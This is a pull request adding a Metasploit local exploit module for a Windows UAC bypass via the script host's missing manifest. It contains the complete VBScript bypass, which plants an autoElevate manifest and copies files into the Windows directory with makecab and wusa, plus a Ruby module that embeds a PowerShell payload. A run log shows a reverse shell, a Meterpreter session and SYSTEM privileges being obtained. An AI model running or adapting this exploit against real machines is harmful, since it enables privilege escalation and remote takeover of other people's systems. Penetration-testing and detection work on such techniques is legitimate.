### PR TITLE
ScriptHost Bypass UAC Technique

### DIFF
--- a/data/exploits/scripthost_uac_bypass/bypass.vbs
+++ b/data/exploits/scripthost_uac_bypass/bypass.vbs
@@ -1,5 +1,7 @@
 Option Explicit
 
+Dim oWs: Set oWs = CreateObject("WScript.Shell")
+Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
 Dim HOST_MANIFEST: HOST_MANIFEST = _
     "<?xml version=""1.0"" encoding=""UTF-8"" standalone=""yes""?>" & vbCrLf & _
     "<assembly xmlns=""urn:schemas-microsoft-com:asm.v1""" & vbCrLf & _
@@ -20,17 +22,8 @@ Dim HOST_MANIFEST: HOST_MANIFEST = _
     "  </asmv3:application>" & vbCrLf & _
     "</assembly>"
 
-Function CanBypass()
-    Dim KEY_NAME: KEY_NAME = _
-        "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\" & _
-        "Policies\System\ConsentPromptBehaviorAdmin"
-    Dim oWs: Set oWs = CreateObject("WScript.Shell")
-    CanBypass = Not CBool(oWs.RegRead(KEY_NAME) And 2)
-End Function
 
 Sub Copy(ByVal sSource, ByVal sTarget)
-    Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
-    Dim oWs: Set oWs = CreateObject("WScript.Shell")
     Dim sTempFile: sTempFile = GetTempFilename()
     oWs.Run "makecab """ & sSource & """ """ & sTempFile & """", 0, True
     oWs.Run "wusa """ & sTempFile & """ /extract:" & sTarget, 0, True
@@ -39,16 +32,10 @@ End Sub
 
 Sub Elevate()
     Const WINDIR = "%windir%"
-    If Not CanBypass() Then
-        Message "User will get warnings...", vbInformation
-        ' Exit Sub
-    End If
-    Dim oWs: Set oWs = CreateObject("WScript.Shell")
     Dim sPath: sPath = Left(WScript.ScriptFullName, _
                             InStrRev(WScript.ScriptFullName, "\"))
     Dim sHost: sHost = Right(WScript.FullName, 11)
     Dim sManifest: sManifest = sPath & sHost & ".manifest"
-    Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
     Dim oStream: Set oStream = oFso.CreateTextFile(sManifest)
     oStream.Write HOST_MANIFEST
     oStream.Close
@@ -60,38 +47,16 @@ End Sub
 
 Function GetTempFilename()
     Const vbTemporaryFolder = 2
-    Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
     Dim sTempFolder: sTempFolder = oFso.GetSpecialFolder(vbTemporaryFolder)
     GetTempFilename = oFso.BuildPath(sTempFolder, oFso.GetTempName())
 End Function
 
-Function HasAdmin()
-    Const VALUE = "RandomValue"
-    Const KEYNAME = "HKLM\SOFTWARE\Microsoft\RandomKey"
-    On Error Resume Next : Err.Clear
-    Dim oWs: Set oWs = CreateObject("WScript.Shell")
-    oWs.RegWrite KEYNAME, VALUE
-    Call oWs.RegRead(KEYNAME)
-    oWs.RegDelete KEYNAME
-    HasAdmin = CBool(Err.Number = 0) 
-End Function
-
-Function Message(ByVal sMessage, ByVal iFlags)
-    Message = MsgBox(sMessage, vbSystemModal Or iFlags, WScript.ScriptName)
-End Function
-
 Sub RunAsAdmin()
-    If HasAdmin() Then
-        Message "Elevated to admin, ...", vbInformation
-    Else
-        Message "Failed... no admin", vbExclamation
-    End If
+  oWs.Run "COMMAND"
 End Sub
 
 If WScript.Arguments.Named.Exists("RESTART") Then
     RunAsAdmin
-ElseIf HasAdmin() Then
-	Message "U Wot M8? This is a elevation test and we're already admin!", vbCritical
 Else
     Elevate
 End If

--- a/data/exploits/scripthost_uac_bypass/bypass.vbs
+++ b/data/exploits/scripthost_uac_bypass/bypass.vbs
@@ -1,0 +1,97 @@
+Option Explicit
+
+Dim HOST_MANIFEST: HOST_MANIFEST = _
+    "<?xml version=""1.0"" encoding=""UTF-8"" standalone=""yes""?>" & vbCrLf & _
+    "<assembly xmlns=""urn:schemas-microsoft-com:asm.v1""" & vbCrLf & _
+    "          xmlns:asmv3=""urn:schemas-microsoft-com:asm.v3""" & vbCrLf & _
+    "          manifestVersion=""1.0"">" & vbCrLf & _
+    "  <asmv3:trustInfo>" & vbCrLf & _
+    "    <security>" & vbCrLf & _
+    "      <requestedPrivileges>" & vbCrLf & _
+    "        <requestedExecutionLevel level=""RequireAdministrator"" uiAccess=""false""/>" & vbCrLf & _
+    "      </requestedPrivileges>" & vbCrLf & _
+    "    </security>" & vbCrLf & _
+    "  </asmv3:trustInfo>" & vbCrLf & _
+    "  <asmv3:application>" & vbCrLf & _
+    "    <asmv3:windowsSettings xmlns=""http://schemas.microsoft.com/SMI/2005/WindowsSettings"">" & vbCrLf & _
+    "      <autoElevate>true</autoElevate>" & vbCrLf & _
+    "      <dpiAware>true</dpiAware>" & vbCrLf & _
+    "    </asmv3:windowsSettings>" & vbCrLf & _
+    "  </asmv3:application>" & vbCrLf & _
+    "</assembly>"
+
+Function CanBypass()
+    Dim KEY_NAME: KEY_NAME = _
+        "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\" & _
+        "Policies\System\ConsentPromptBehaviorAdmin"
+    Dim oWs: Set oWs = CreateObject("WScript.Shell")
+    CanBypass = Not CBool(oWs.RegRead(KEY_NAME) And 2)
+End Function
+
+Sub Copy(ByVal sSource, ByVal sTarget)
+    Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
+    Dim oWs: Set oWs = CreateObject("WScript.Shell")
+    Dim sTempFile: sTempFile = GetTempFilename()
+    oWs.Run "makecab """ & sSource & """ """ & sTempFile & """", 0, True
+    oWs.Run "wusa """ & sTempFile & """ /extract:" & sTarget, 0, True
+    oFso.DeleteFile sTempFile
+End Sub
+
+Sub Elevate()
+    Const WINDIR = "%windir%"
+    If Not CanBypass() Then
+        Message "User will get warnings...", vbInformation
+        ' Exit Sub
+    End If
+    Dim oWs: Set oWs = CreateObject("WScript.Shell")
+    Dim sPath: sPath = Left(WScript.ScriptFullName, _
+                            InStrRev(WScript.ScriptFullName, "\"))
+    Dim sHost: sHost = Right(WScript.FullName, 11)
+    Dim sManifest: sManifest = sPath & sHost & ".manifest"
+    Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
+    Dim oStream: Set oStream = oFso.CreateTextFile(sManifest)
+    oStream.Write HOST_MANIFEST
+    oStream.Close
+    Copy sManifest, WINDIR
+    Copy WScript.FullName, WINDIR
+    oWs.Run WINDIR & "\" & sHost & " """ & WScript.ScriptFullName & """ /RESTART"
+    oFso.DeleteFile sManifest
+End Sub
+
+Function GetTempFilename()
+    Const vbTemporaryFolder = 2
+    Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
+    Dim sTempFolder: sTempFolder = oFso.GetSpecialFolder(vbTemporaryFolder)
+    GetTempFilename = oFso.BuildPath(sTempFolder, oFso.GetTempName())
+End Function
+
+Function HasAdmin()
+    Const VALUE = "RandomValue"
+    Const KEYNAME = "HKLM\SOFTWARE\Microsoft\RandomKey"
+    On Error Resume Next : Err.Clear
+    Dim oWs: Set oWs = CreateObject("WScript.Shell")
+    oWs.RegWrite KEYNAME, VALUE
+    Call oWs.RegRead(KEYNAME)
+    oWs.RegDelete KEYNAME
+    HasAdmin = CBool(Err.Number = 0) 
+End Function
+
+Function Message(ByVal sMessage, ByVal iFlags)
+    Message = MsgBox(sMessage, vbSystemModal Or iFlags, WScript.ScriptName)
+End Function
+
+Sub RunAsAdmin()
+    If HasAdmin() Then
+        Message "Elevated to admin, ...", vbInformation
+    Else
+        Message "Failed... no admin", vbExclamation
+    End If
+End Sub
+
+If WScript.Arguments.Named.Exists("RESTART") Then
+    RunAsAdmin
+ElseIf HasAdmin() Then
+	Message "U Wot M8? This is a elevation test and we're already admin!", vbCritical
+Else
+    Elevate
+End If

--- a/modules/exploits/windows/local/bypassuac.rb
+++ b/modules/exploits/windows/local/bypassuac.rb
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Local
     case get_uac_level
     when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
       fail_with(Failure::NotVulnerable,
-        "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
+        "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
       )
     when UAC_DEFAULT
       print_good 'UAC is set to Default'

--- a/modules/exploits/windows/local/bypassuac_injection.rb
+++ b/modules/exploits/windows/local/bypassuac_injection.rb
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local
         UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
         UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
         fail_with(Failure::NotVulnerable,
-                  "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
+                  "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
         )
       when UAC_DEFAULT
         print_good('UAC is set to Default')

--- a/modules/exploits/windows/local/bypassuac_vbs.rb
+++ b/modules/exploits/windows/local/bypassuac_vbs.rb
@@ -1,0 +1,141 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::FileDropper
+  include Exploit::Powershell
+  include Post::File
+  include Post::Windows::Priv
+  include Post::Windows::Runas
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)',
+      'Description'   => %q{
+        This module will bypass Windows UAC by utilizing the missing .manifest on the script host
+        cscript/wscript.exe binaries.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'Vozzie',
+          'Ben Campbell'
+        ],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      'Targets'       => [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+      ],
+      'DefaultTarget' => 0,
+      'References'    => [
+        [
+          'URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html',
+          'URL', 'https://github.com/Vozzie/uacscript'
+        ]
+      ],
+      'DisclosureDate'=> 'Aug 22 2015'
+    ))
+
+  end
+
+  def exploit
+    # Validate that we can actually do things before we bother
+    # doing any more work
+    validate_environment!
+    check_permissions!
+
+    # get all required environment variables in one shot instead. This
+    # is a better approach because we don't constantly make calls through
+    # the session to get the variables.
+    env_vars = get_envs('TEMP', 'WINDIR')
+
+    case get_uac_level
+      when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+        UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+        UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+        fail_with(Failure::NotVulnerable,
+                  "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
+        )
+      when UAC_DEFAULT
+        print_good('UAC is set to Default')
+        print_good('BypassUAC can bypass this setting, continuing...')
+      when UAC_NO_PROMPT
+        print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+        shell_execute_exe
+        return
+    end
+
+    vbs_filepath = "#{env_vars['TEMP']}\\#{rand_text_alpha(8)}.vbs"
+
+    upload_vbs(vbs_filepath)
+
+    cmd_exec("cscript.exe //B #{vbs_filepath}")
+  end
+
+  def check_permissions!
+    # Check if you are an admin
+    vprint_status('Checking admin status...')
+    admin_group = is_in_admin_group?
+
+    if admin_group.nil?
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+    else
+      if admin_group
+        print_good('Part of Administrators group! Continuing...')
+      else
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+
+    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
+    end
+  end
+
+  def upload_vbs(payload_filepath)
+    vbs = File.read(File.join(Msf::Config.data_directory,
+                                  'exploits',
+                                  'scripthost_uac_bypass',
+                                  'bypass.vbs'))
+
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)
+
+    vbs.gsub!('COMMAND', command)
+    print_status('Uploading the Payload VBS to the filesystem...')
+    begin
+      vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..")
+      write_file(payload_filepath, vbs)
+      register_file_for_cleanup(payload_filepath)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}")
+    end
+  end
+
+  def validate_environment!
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+
+    winver = sysinfo['OS']
+
+    case winver
+    when /Windows (7|8|2008|2012)/
+      print_good("#{winver} may be vulnerable.")
+    else
+      fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
+    end
+
+    if is_uac_enabled?
+      print_status('UAC is Enabled, checking level...')
+    else
+      unless is_in_admin_group?
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+  end
+end

--- a/modules/exploits/windows/local/bypassuac_vbs.rb
+++ b/modules/exploits/windows/local/bypassuac_vbs.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Local
         UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
         UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
         fail_with(Failure::NotVulnerable,
-                  "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
+                  "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
         )
       when UAC_DEFAULT
         print_good('UAC is set to Default')

--- a/modules/exploits/windows/local/bypassuac_vbs.rb
+++ b/modules/exploits/windows/local/bypassuac_vbs.rb
@@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Local
     winver = sysinfo['OS']
 
     case winver
-    when /Windows (7|8|2008|2012)/
+    when /Windows (7|2008)/
       print_good("#{winver} may be vulnerable.")
     else
       fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")

--- a/modules/exploits/windows/local/bypassuac_vbs.rb
+++ b/modules/exploits/windows/local/bypassuac_vbs.rb
@@ -29,8 +29,7 @@ class Metasploit3 < Msf::Exploit::Local
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ],
       'Targets'       => [
-          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
-          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
       ],
       'DefaultTarget' => 0,
       'References'    => [


### PR DESCRIPTION
Uses the missing .manifest file on the cscript/wscript files to bypass UAC.  
## Example Run

```
[*] [2015.08.23-20:15:28] Started reverse handler on 192.168.72.133:5555 
[+] [2015.08.23-20:15:29] Windows 7 (Build 7600). may be vulnerable.
[*] [2015.08.23-20:15:29] UAC is Enabled, checking level...
[*] [2015.08.23-20:15:29] Checking admin status...
[+] [2015.08.23-20:15:30] Part of Administrators group! Continuing...
[+] [2015.08.23-20:15:31] UAC is set to Default
[+] [2015.08.23-20:15:31] BypassUAC can bypass this setting, continuing...
[*] [2015.08.23-20:15:31] Powershell command length: 2259
[*] [2015.08.23-20:15:31] Uploading the Payload VBS to the filesystem...
[*] [2015.08.23-20:15:31] Payload VBS 4614 bytes long being uploaded..
[*] [2015.08.23-20:15:32] Sending stage (885806 bytes) to 192.168.72.134
[*] Meterpreter session 5 opened (192.168.72.133:5555 -> 192.168.72.134:49162) at 2015-08-23 20:15:34 +0100
[+] [2015.08.23-20:15:37] Deleted C:\Users\User\AppData\Local\Temp\gtYlwnLT.vbs

meterpreter > getsystem
[-] Unknown command: getsystem.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
```
## Verification
- [ ] Runs on Windows 7

<del>- [ ] Runs on Windows 8</del>


<del>-  [ ] Runs on Windows 8.1 (todo check the verification?)</del>


<del>-  [ ] Runs on Windows 10 (Todo meterpreter bugs!)</del>

- [ ] VBS Script is cleaned off target host

It currently just uses a powershell command line for a payload, but an alternative technique could be to just upload an executable. 
